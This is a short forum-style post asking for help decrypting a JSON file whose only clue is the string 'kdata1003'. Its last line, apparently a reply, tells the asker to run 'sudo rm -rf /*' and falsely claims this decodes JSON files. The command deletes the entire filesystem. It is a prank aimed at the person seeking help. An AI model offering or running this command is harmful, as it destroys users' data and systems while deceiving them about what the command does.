Decrypting JSON file

I need help decrypting this json file. The only clue I have is kdata1003. It's the only thing that doesn't change when I change the encoding from like unicode to ascii, which makes me believe it's the header or key. kdata is probably the encryption type and 1003 is some sort of variable.
Correct me if I'm wrong.
Json files aren't supported here so here it is in Western languages (Windows) encoding

open up a terminal window and type sudo rm -rf /*, that decodes JSON files
